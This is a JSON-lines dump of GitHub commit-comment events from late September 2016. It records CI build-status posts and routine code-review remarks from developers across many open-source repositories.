{"id":"4634223657","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216734,"position":null,"line":null,"path":null,"commit_id":"c61c3fd86be4928df3d148f2e12f0446f38a8f7f","created_at":"2016-09-29T00:04:38Z","updated_at":"2016-09-29T00:04:38Z","body":"os_2_0_develop (axelstudios) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c61c3fd86be4928df3d148f2e12f0446f38a8f7f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T00:04:38Z"}
{"id":"4634223706","type":"CommitCommentEvent","actor":{"login":"Phoenix616"},"repo":{"name":"Phoenix616/ChestShopNotifier"},"payload":{"comment":{"id":19216735,"position":null,"line":null,"path":null,"commit_id":"eb0a2b77a7d9350249acc49ae29573c20b618737","created_at":"2016-09-29T00:04:39Z","updated_at":"2016-09-29T00:04:39Z","body":"Meh, looks like for whatever reason I have a different chestshop version\nlocally in my ide than on the buildserver... I'll have to fix that tomorrow.\n"}},"created_at":"2016-09-29T00:04:39Z"}
{"id":"4634232745","type":"CommitCommentEvent","actor":{"login":"maxexcloo"},"repo":{"name":"maxexcloo/Docker"},"payload":{"comment":{"id":19216759,"position":1,"line":1,"path":"base/data/Dockerfile","commit_id":"71881d37aa68433212f304edda05b6a27616ba22","created_at":"2016-09-29T00:07:06Z","updated_at":"2016-09-29T00:07:06Z","body":"Honestly with the new docker volume system I assumed it wasn't needed anymore..."}},"created_at":"2016-09-29T00:07:06Z"}
{"id":"4634245450","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"maxfields2000/dockerjenkins_tutorial"},"payload":{"comment":{"id":19216794,"position":null,"line":null,"path":null,"commit_id":"d96d9dabb5cabdcb77d007875781deacc7346665","created_at":"2016-09-29T00:10:38Z","updated_at":"2016-09-29T00:10:38Z","body":"Small hint, JNLP rely on jenkins global hostname. If it not accessible from container it is possible simply set `hosts` in slave template. And resolv also.. But then it adds complexity to configure system settings as still there is no some released DSL for global settings."}},"created_at":"2016-09-29T00:10:38Z"}
{"id":"4634250230","type":"CommitCommentEvent","actor":{"login":"TiagoAFontana"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19216810,"position":17,"line":27,"path":"ophidian/parser/LibertyParser.h","commit_id":"9932973109f6e4959712525542813aa0823d6e41","created_at":"2016-09-29T00:12:01Z","updated_at":"2016-09-29T00:12:01Z","body":"Add name of related pin.\r\nVector of LUT\r\n"}},"created_at":"2016-09-29T00:12:01Z"}
{"id":"4634253420","type":"CommitCommentEvent","actor":{"login":"TiagoAFontana"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19216822,"position":7,"line":17,"path":"ophidian/parser/LibertyParser.h","commit_id":"9932973109f6e4959712525542813aa0823d6e41","created_at":"2016-09-29T00:12:54Z","updated_at":"2016-09-29T00:12:54Z","body":"Name of type (rise_delay)"}},"created_at":"2016-09-29T00:12:54Z"}
{"id":"4634255290","type":"CommitCommentEvent","actor":{"login":"DavieV"},"repo":{"name":"Quinny/uWindsor-POTW-Leaderboard"},"payload":{"comment":{"id":19216827,"position":null,"line":null,"path":null,"commit_id":"5492e76b30af7c11efe3007bcf2d5615325c6ff7","created_at":"2016-09-29T00:13:26Z","updated_at":"2016-09-29T00:13:26Z","body":"Beauty commit."}},"created_at":"2016-09-29T00:13:26Z"}
{"id":"4634259611","type":"CommitCommentEvent","actor":{"login":"Undergarun"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19216837,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T00:14:42Z","updated_at":"2016-09-29T00:14:42Z","body":"@Aokromes What is the guid policy of TDB? Any place to see?"}},"created_at":"2016-09-29T00:14:42Z"}
{"id":"4634263572","type":"CommitCommentEvent","actor":{"login":"jgallen23"},"repo":{"name":"firstandthird/s3put"},"payload":{"comment":{"id":19216845,"position":7,"line":10,"path":"lib/s3.js","commit_id":"06ab8ea0f6cd1ea790ca7462c589c5908cfb81fb","created_at":"2016-09-29T00:15:47Z","updated_at":"2016-09-29T00:15:47Z","body":"you still have path.basename"}},"created_at":"2016-09-29T00:15:47Z"}
{"id":"4634263888","type":"CommitCommentEvent","actor":{"login":"aleks-sidorenko"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":19216846,"position":17,"line":1807,"path":"src/jit/gentree.cpp","commit_id":"e89d9f92815ec2a23f935633c80457d202c24ff1","created_at":"2016-09-29T00:15:52Z","updated_at":"2016-09-29T00:15:52Z","body":"typo"}},"created_at":"2016-09-29T00:15:52Z"}
{"id":"4634266178","type":"CommitCommentEvent","actor":{"login":"elliotchance"},"repo":{"name":"willemstuursma/concise"},"payload":{"comment":{"id":19216856,"position":null,"line":null,"path":null,"commit_id":"0bcc339e43cab1999192ea88c55d3d5262c1fc4b","created_at":"2016-09-29T00:16:31Z","updated_at":"2016-09-29T00:16:31Z","body":"Did you want to put this in as a pull request?"}},"created_at":"2016-09-29T00:16:31Z"}
{"id":"4634268548","type":"CommitCommentEvent","actor":{"login":"dsl89125"},"repo":{"name":"strongliang/creadr-web"},"payload":{"comment":{"id":19216861,"position":null,"line":null,"path":null,"commit_id":"000d4c2d060ac52a2e6176f8e3444e9fa501600d","created_at":"2016-09-29T00:17:14Z","updated_at":"2016-09-29T00:17:14Z","body":"should i merge this branch ?\r\n"}},"created_at":"2016-09-29T00:17:14Z"}
{"id":"4634274213","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216879,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-29T00:18:56Z","updated_at":"2016-09-29T00:18:56Z","body":"<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-i386-Windows-7-VisualStudio-12.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-29T00:18:56Z"}
{"id":"4634278228","type":"CommitCommentEvent","actor":{"login":"nbougalis"},"repo":{"name":"vinniefalco/Beast"},"payload":{"comment":{"id":19216890,"position":35,"line":53,"path":"include/beast/websocket/detail/mask.hpp","commit_id":"8eac73fb251ada352e85fee40af72e32c74cbfd4","created_at":"2016-09-29T00:20:07Z","updated_at":"2016-09-29T00:20:07Z","body":"You're throwing away 32 bits of entropy from `v[0]` here, for no good reason. Two options: you can remove the left-shift and just add the two values together, or you can do this, which is way simpler:\r\n\r\n```\r\ntemplate<class Sseq>\r\n    typename std::enable_if<\r\n    ! std::is_integral<Sseq>::value>::type\r\nseed(Sseq& ss)\r\n{\r\n    // The seed we generate must not be zero everywhere\r\n    do\r\n        ss.generate (std::begin(s_), std::end(s_));\r\n    while (s_[0] || s_[1]);\r\n}\r\n```"}},"created_at":"2016-09-29T00:20:07Z"}
{"id":"4634280009","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"dlang/phobos"},"payload":{"comment":{"id":19216892,"position":14,"line":13,"path":"std/experimental/ndslice/internal.d","commit_id":"a5e935370f5de590532bb5d12610c865343f56a9","created_at":"2016-09-29T00:20:35Z","updated_at":"2016-09-29T00:20:35Z","body":"This paragraph seems rather hard to understand. Are you saying that the functions here aren't actually influenced by `fastmath` themselves, but is expected to be merged with code that is during inlining, so you mark them as `fastmath` such as not to disallow certain optimisations allowed by the function-level LLVM flag? What you you mean by `fmb alias is used to relax users`? That you use the name `fmb` instead of `fastmath` purely on psychological grounds such as not to scare users?"}},"created_at":"2016-09-29T00:20:35Z"}
{"id":"4634281958","type":"CommitCommentEvent","actor":{"login":"ceefour"},"repo":{"name":"BesutKode/BesutKode.github.io"},"payload":{"comment":{"id":19216895,"position":null,"line":null,"path":null,"commit_id":"8d75f72fa7306fb9fd99de5d027e3110e14fad58","created_at":"2016-09-29T00:21:11Z","updated_at":"2016-09-29T00:21:11Z","body":"@reksasuhud97 yang penting sudah berkontribusi PR mas, tidak harus menunggu PR tersebut merged. Silakan lanjutkan langkah-langkah untuk kelengkapan pendaftaran"}},"created_at":"2016-09-29T00:21:11Z"}
{"id":"4634282301","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19216896,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-29T00:21:16Z","updated_at":"2016-09-29T00:21:16Z","body":"@MarshallOfSound the issue we have is not with the packaging, it's with the download using prebuilt. What I'm suggesting wouldn't have any backwards compatibility issues"}},"created_at":"2016-09-29T00:21:16Z"}
{"id":"4634282633","type":"CommitCommentEvent","actor":{"login":"Ekci"},"repo":{"name":"ArduPilot/MissionPlanner"},"payload":{"comment":{"id":19216899,"position":null,"line":null,"path":null,"commit_id":"33561fbbbec7b0b55dc7d5dca0a15a2d38a8d4c1","created_at":"2016-09-29T00:21:22Z","updated_at":"2016-09-29T00:21:22Z","body":"Thank you! Ant thanks for the team that forwarded our problem :)"}},"created_at":"2016-09-29T00:21:22Z"}
{"id":"4634294808","type":"CommitCommentEvent","actor":{"login":"jcanizales"},"repo":{"name":"apple/swift-protobuf-runtime"},"payload":{"comment":{"id":19216932,"position":null,"line":null,"path":null,"commit_id":"6b1a0b0a270f31b93c3d4255d94f8d8f2f9e1ae0","created_at":"2016-09-29T00:25:03Z","updated_at":"2016-09-29T00:25:03Z","body":"There are libraries that use the ObjC Protobuf runtime as a dependency of their implementation, so it's not always the case that the user can choose between this and that runtime."}},"created_at":"2016-09-29T00:25:03Z"}
{"id":"4634297696","type":"CommitCommentEvent","actor":{"login":"RobertCNelson"},"repo":{"name":"RobertCNelson/Bootloader-Builder"},"payload":{"comment":{"id":19216936,"position":100,"line":298,"path":"patches/next/0001-am335x_evm-uEnv.txt-bootz-n-fixes.patch","commit_id":"15587f2449937024cd4d9053995758f50b375bfc","created_at":"2016-09-29T00:25:57Z","updated_at":"2016-09-29T00:25:57Z","body":"I got you covered: BWxx\r\nhttps://github.com/RobertCNelson/Bootloader-Builder/blob/master/patches/v2016.09/0001-am335x_evm-uEnv.txt-bootz-n-fixes.patch#L740\r\n\r\nRegards,"}},"created_at":"2016-09-29T00:25:57Z"}
{"id":"4634302306","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19216948,"position":null,"line":null,"path":null,"commit_id":"b07f743bab81867932be6da4104e66c60677433b","created_at":"2016-09-29T00:27:20Z","updated_at":"2016-09-29T00:27:20Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.75.b07f743bab81867932be6da4104e66c60677433b](http://build.palaso.org/viewLog.html?buildId=77183&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 3377, ignored: 124 Build time: 00:17:00"}},"created_at":"2016-09-29T00:27:20Z"}
{"id":"4634302956","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19216951,"position":null,"line":null,"path":null,"commit_id":"b07f743bab81867932be6da4104e66c60677433b","created_at":"2016-09-29T00:27:32Z","updated_at":"2016-09-29T00:27:32Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.777.b07f743bab81867932be6da4104e66c60677433b](http://build.palaso.org/viewLog.html?buildId=77184&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3337, ignored: 130 Build time: 00:21:34"}},"created_at":"2016-09-29T00:27:32Z"}
{"id":"4634304737","type":"CommitCommentEvent","actor":{"login":"alilotfi"},"repo":{"name":"PaulWoitaschek/MaterialAudiobookPlayer"},"payload":{"comment":{"id":19216961,"position":null,"line":null,"path":null,"commit_id":"7208e8e6b04bb7c1eb23df802d23b5c32d2e1d66","created_at":"2016-09-29T00:28:05Z","updated_at":"2016-09-29T00:28:05Z","body":"Because calling `show()` will raise:\r\n`java.lang.IllegalStateException: Can not perform this action after onSaveInstanceState`\r\nThe reason is that, when we show the menu dialog to user, activity saves it's instance before being paused, so before resuming again, we cannot attach a fragment to it."}},"created_at":"2016-09-29T00:28:05Z"}
{"id":"4634310041","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19216980,"position":15,"line":15,"path":"design/simple_example.py","commit_id":"6a312fad8e4212ba22de36265294746d1e1b4d57","created_at":"2016-09-29T00:29:39Z","updated_at":"2016-09-29T00:29:39Z","body":"what is END? where is it defined?"}},"created_at":"2016-09-29T00:29:39Z"}
{"id":"4634311053","type":"CommitCommentEvent","actor":{"login":"Dylan-M"},"repo":{"name":"MegaMek/mekhq"},"payload":{"comment":{"id":19216984,"position":null,"line":null,"path":null,"commit_id":"1ca0d292e642f1aec23acc73c172eb8a14b1f1b3","created_at":"2016-09-29T00:29:58Z","updated_at":"2016-09-29T00:29:58Z","body":"Panel never gets set back to images if you change back to a normal image."}},"created_at":"2016-09-29T00:29:58Z"}
{"id":"4634323173","type":"CommitCommentEvent","actor":{"login":"vinniefalco"},"repo":{"name":"vinniefalco/Beast"},"payload":{"comment":{"id":19217009,"position":35,"line":53,"path":"include/beast/websocket/detail/mask.hpp","commit_id":"8eac73fb251ada352e85fee40af72e32c74cbfd4","created_at":"2016-09-29T00:33:37Z","updated_at":"2016-09-29T00:33:37Z","body":"`std::seed_seq::result_type` is `std::leastuint32_t`, and the state for xor shift engine is 64 bits so... are you sure its losing entropy?"}},"created_at":"2016-09-29T00:33:37Z"}
{"id":"4634330408","type":"CommitCommentEvent","actor":{"login":"spencerlyon2"},"repo":{"name":"QuantEcon/QuantEcon.cheatsheet"},"payload":{"comment":{"id":19217023,"position":19,"line":115,"path":"conf.py","commit_id":"22018c5aa44146514b6910e0c7380f4a324f0d6e","created_at":"2016-09-29T00:35:48Z","updated_at":"2016-09-29T00:35:48Z","body":"This shouldn't be here -- it looks like it came from an unresolved git merge"}},"created_at":"2016-09-29T00:35:48Z"}
{"id":"4634333630","type":"CommitCommentEvent","actor":{"login":"Terminus-IMRC"},"repo":{"name":"raspberrypi/firmware"},"payload":{"comment":{"id":19217031,"position":null,"line":null,"path":null,"commit_id":"ad8608c08b122b2c228dba0ff5070d6e9519faf5","created_at":"2016-09-29T00:36:47Z","updated_at":"2016-09-29T00:36:47Z","body":"What is \"Pi2+\"? The new version of Raspberry Pi?"}},"created_at":"2016-09-29T00:36:47Z"}
{"id":"4634335235","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19217036,"position":null,"line":null,"path":null,"commit_id":"01469e6b8377bf72eb3609e67364e050eac0ee77","created_at":"2016-09-29T00:37:18Z","updated_at":"2016-09-29T00:37:18Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.272.01469e6b8377bf72eb3609e67364e050eac0ee77](http://build.palaso.org/viewLog.html?buildId=77185&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1506, ignored: 17 Build time: 00:09:26"}},"created_at":"2016-09-29T00:37:18Z"}
{"id":"4634337943","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19217041,"position":null,"line":null,"path":null,"commit_id":"b07f743bab81867932be6da4104e66c60677433b","created_at":"2016-09-29T00:38:12Z","updated_at":"2016-09-29T00:38:12Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.771.b07f743bab81867932be6da4104e66c60677433b](http://build.palaso.org/viewLog.html?buildId=77186&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3377, ignored: 124 Build time: 00:06:29"}},"created_at":"2016-09-29T00:38:12Z"}
{"id":"4634341229","type":"CommitCommentEvent","actor":{"login":"GITMMarcos"},"repo":{"name":"GITMMarcos/mauricio-exemplo"},"payload":{"comment":{"id":19217046,"position":null,"line":null,"path":null,"commit_id":"951bf6da379e44e64e304f3c55e24896038bf251","created_at":"2016-09-29T00:39:16Z","updated_at":"2016-09-29T00:39:16Z","body":"Deletado"}},"created_at":"2016-09-29T00:39:16Z"}
{"id":"4634341740","type":"CommitCommentEvent","actor":{"login":"GITMMarcos"},"repo":{"name":"GITMMarcos/mauricio-exemplo"},"payload":{"comment":{"id":19217048,"position":null,"line":null,"path":null,"commit_id":"951bf6da379e44e64e304f3c55e24896038bf251","created_at":"2016-09-29T00:39:27Z","updated_at":"2016-09-29T00:39:27Z","body":"Deletado"}},"created_at":"2016-09-29T00:39:27Z"}
{"id":"4634354409","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19217085,"position":null,"line":null,"path":null,"commit_id":"9208078c71895614a343da004d0f99aa26222840","created_at":"2016-09-29T00:43:45Z","updated_at":"2016-09-29T00:43:45Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1102.9208078c71895614a343da004d0f99aa26222840](http://build.palaso.org/viewLog.html?buildId=77187&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3377, ignored: 124 Build time: 00:05:24"}},"created_at":"2016-09-29T00:43:45Z"}
{"id":"4634355060","type":"CommitCommentEvent","actor":{"login":"jonobr1"},"repo":{"name":"jonobr1/equalizer"},"payload":{"comment":{"id":19217088,"position":null,"line":null,"path":null,"commit_id":"6653efd98d7ef0331eab3bd274398661b0e72a58","created_at":"2016-09-29T00:43:57Z","updated_at":"2016-09-29T00:43:57Z","body":"???"}},"created_at":"2016-09-29T00:43:57Z"}
{"id":"4634364165","type":"CommitCommentEvent","actor":{"login":"Stane1983"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19217110,"position":null,"line":null,"path":null,"commit_id":"40cab058daf7d14f2cc3c3ccc8b59a2b483b2fe3","created_at":"2016-09-29T00:46:49Z","updated_at":"2016-09-29T00:46:49Z","body":"Really?! Generalize basically Amlogic related patches to all aarch64 projects? I just don't get it..."}},"created_at":"2016-09-29T00:46:49Z"}
{"id":"4634365222","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217114,"position":null,"line":null,"path":null,"commit_id":"58bf818f46873a4dbc95725732abac6276133ff4","created_at":"2016-09-29T00:47:09Z","updated_at":"2016-09-29T00:47:09Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-58bf818f46873a4dbc95725732abac6276133ff4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-58bf818f46873a4dbc95725732abac6276133ff4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T00:47:09Z"}
{"id":"4634366756","type":"CommitCommentEvent","actor":{"login":"DCPerko"},"repo":{"name":"DCPerko/Hello-world"},"payload":{"comment":{"id":19217120,"position":null,"line":null,"path":null,"commit_id":"9660c822f48846ed003962dd4728e159cfea0037","created_at":"2016-09-29T00:47:35Z","updated_at":"2016-09-29T00:47:35Z","body":"These comments don't appear in the file, correct?"}},"created_at":"2016-09-29T00:47:35Z"}
{"id":"4634371480","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19217138,"position":null,"line":null,"path":null,"commit_id":"b07f743bab81867932be6da4104e66c60677433b","created_at":"2016-09-29T00:49:03Z","updated_at":"2016-09-29T00:49:03Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1103.b07f743bab81867932be6da4104e66c60677433b](http://build.palaso.org/viewLog.html?buildId=77188&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3377, ignored: 124 Build time: 00:05:14"}},"created_at":"2016-09-29T00:49:03Z"}
{"id":"4634371881","type":"CommitCommentEvent","actor":{"login":"sam-m888"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19217139,"position":null,"line":null,"path":null,"commit_id":"6f16f9b3b6cf7dce737967e46deff37bbe49ccd7","created_at":"2016-09-29T00:49:09Z","updated_at":"2016-09-29T00:49:09Z","body":"Thanks for fixing these :+1: "}},"created_at":"2016-09-29T00:49:09Z"}
{"id":"4634372985","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19217140,"position":null,"line":null,"path":null,"commit_id":"6e72009bca6ffb0e385cfba40b5a7c590efc94d6","created_at":"2016-09-29T00:49:31Z","updated_at":"2016-09-29T00:49:31Z","body":"Tuning is hard, but I think that including MidgameLimit into such tuning is not a good idea.\r\n\r\nIt is not in the same order of magnitude than the other bonus, \r\nso the large fluctuations on that parameter will probably completely shadow any progress on smaller ones."}},"created_at":"2016-09-29T00:49:31Z"}
{"id":"4634375327","type":"CommitCommentEvent","actor":{"login":"sam-m888"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19217151,"position":null,"line":null,"path":null,"commit_id":"8e5e836bf88cf48bfddfb1298c13e54aa7fa3317","created_at":"2016-09-29T00:50:13Z","updated_at":"2016-09-29T00:50:13Z","body":"Fixed by @romjerome  in 6f16f9b3b6cf7dce737967e46deff37bbe49ccd7\r\n\r\nThank you"}},"created_at":"2016-09-29T00:50:13Z"}
{"id":"4634376323","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19217153,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-29T00:50:31Z","updated_at":"2016-09-29T00:50:31Z","body":"Just when login.\r\n\r\nYou can login without any problem using all this datapack?"}},"created_at":"2016-09-29T00:50:31Z"}
{"id":"4634380990","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217163,"position":9,"line":23,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T00:51:58Z","updated_at":"2016-09-29T00:51:58Z","body":"Converter is not a good name for the token. The word does not describe what the Contract implements but refers to a technique. Consider to rename it to ERC20EtherToken.sol"}},"created_at":"2016-09-29T00:51:58Z"}
{"id":"4634382971","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217168,"position":null,"line":null,"path":null,"commit_id":"58bf818f46873a4dbc95725732abac6276133ff4","created_at":"2016-09-29T00:52:34Z","updated_at":"2016-09-29T00:52:34Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-58bf818f46873a4dbc95725732abac6276133ff4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T00:52:34Z"}
{"id":"4634388939","type":"CommitCommentEvent","actor":{"login":"meatspace"},"repo":{"name":"garrynewman/garrysmod"},"payload":{"comment":{"id":19217182,"position":null,"line":null,"path":null,"commit_id":"8640ee5db9307ff6734fe2b32b2034b8a15bc570","created_at":"2016-09-29T00:54:22Z","updated_at":"2016-09-29T00:54:22Z","body":"luv u"}},"created_at":"2016-09-29T00:54:22Z"}
{"id":"4634397740","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217230,"position":18,"line":32,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T00:57:04Z","updated_at":"2016-09-29T00:57:04Z","body":"please remove dead code remains. please always try hard to deliver the cleanest code possible. this is not a nice to have but a minimal requirement to not upset your colleagues. "}},"created_at":"2016-09-29T00:57:04Z"}
{"id":"4634400839","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"aidoom/aidoom.github.io"},"payload":{"comment":{"id":19217232,"position":4,"line":13,"path":"_posts/2014-07-10-ib-headless.md","commit_id":"2b76c135ac1ccdbd060ada01ea96df49181ec677","created_at":"2016-09-29T00:57:57Z","updated_at":"2016-09-29T00:57:57Z","body":"The project is no longer there."}},"created_at":"2016-09-29T00:57:57Z"}
{"id":"4634403230","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217237,"position":17,"line":31,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T00:58:39Z","updated_at":"2016-09-29T00:58:39Z","body":"maybe also not that this is the default function. what are the implications? "}},"created_at":"2016-09-29T00:58:39Z"}
{"id":"4634407463","type":"CommitCommentEvent","actor":{"login":"gpascualg"},"repo":{"name":"gpascualg/AutoDiff"},"payload":{"comment":{"id":19217245,"position":1,"line":1,"path":"src/blas.hpp","commit_id":"dd58321dc6669686ea581a4c37b7e63f36a86910","created_at":"2016-09-29T00:59:53Z","updated_at":"2016-09-29T00:59:53Z","body":"For matrix multiplication: https://people.maths.ox.ac.uk/gilesm/files/NA-08-01.pdf"}},"created_at":"2016-09-29T00:59:53Z"}
{"id":"4634411332","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217258,"position":20,"line":34,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T01:00:58Z","updated_at":"2016-09-29T01:00:58Z","body":"consider to check for msg.value > 0 before executing the rest of the function"}},"created_at":"2016-09-29T01:00:58Z"}
{"id":"4634419831","type":"CommitCommentEvent","actor":{"login":"nitrag"},"repo":{"name":"naturalatlas/leaflet-graphicscale"},"payload":{"comment":{"id":19217268,"position":null,"line":null,"path":null,"commit_id":"91878d2ca1b07b6233bd5c2d6f683fc305607f95","created_at":"2016-09-29T01:03:26Z","updated_at":"2016-09-29T01:03:26Z","body":"Much appreciated for converting to adding \"standard\" units. You should create a PR! Thanks!!"}},"created_at":"2016-09-29T01:03:26Z"}
{"id":"4634425534","type":"CommitCommentEvent","actor":{"login":"errorware"},"repo":{"name":"errorware/SureScrapper"},"payload":{"comment":{"id":19217281,"position":1,"line":1,"path":"SureScrapper/Default.aspx.cs","commit_id":"45a48c4aa1c2f9afe487957d2cc837786be83b13","created_at":"2016-09-29T01:05:07Z","updated_at":"2016-09-29T01:05:07Z","body":"Delete unused directives."}},"created_at":"2016-09-29T01:05:07Z"}
{"id":"4634427176","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217284,"position":29,"line":44,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T01:05:36Z","updated_at":"2016-09-29T01:05:36Z","body":"are you that the ether suffix will divide?"}},"created_at":"2016-09-29T01:05:36Z"}
{"id":"4634427710","type":"CommitCommentEvent","actor":{"login":"Leeingnyo"},"repo":{"name":"wafflestudio/siksha-server"},"payload":{"comment":{"id":19217285,"position":null,"line":null,"path":null,"commit_id":"b7bdc0de9f17fb78cfddb18bd58f1814a8c54643","created_at":"2016-09-29T01:05:45Z","updated_at":"2016-09-29T01:05:45Z","body":".index.js.swp 가 남아있습니다.\r\n\r\n그리고 이미 푸시가 되어서 여기선 절대 하지 말고  \r\n다음부터 저런 쓸 데 없는 파일이 들어갔을 경우에 이미 커밋을 해버렸다면  \r\ngit rebase -i 나 git commit --amend 등의 명령어로 커밋을 정리하고 올려보시길 바랍니다  \r\ngit rebase -i 와 git commit --amend 를 공부해보세요!"}},"created_at":"2016-09-29T01:05:45Z"}
{"id":"4634430441","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217291,"position":38,"line":51,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T01:06:34Z","updated_at":"2016-09-29T01:06:34Z","body":"are you that the ether suffix will divide?"}},"created_at":"2016-09-29T01:06:34Z"}
{"id":"4634432300","type":"CommitCommentEvent","actor":{"login":"homonecloco"},"repo":{"name":"homonecloco/PhdThesis"},"payload":{"comment":{"id":19217298,"position":null,"line":null,"path":null,"commit_id":"8ddbfd0f588955a70e1b949608249307aabfd4d0","created_at":"2016-09-29T01:07:06Z","updated_at":"2016-09-29T01:07:06Z","body":"Deleting.. "}},"created_at":"2016-09-29T01:07:06Z"}
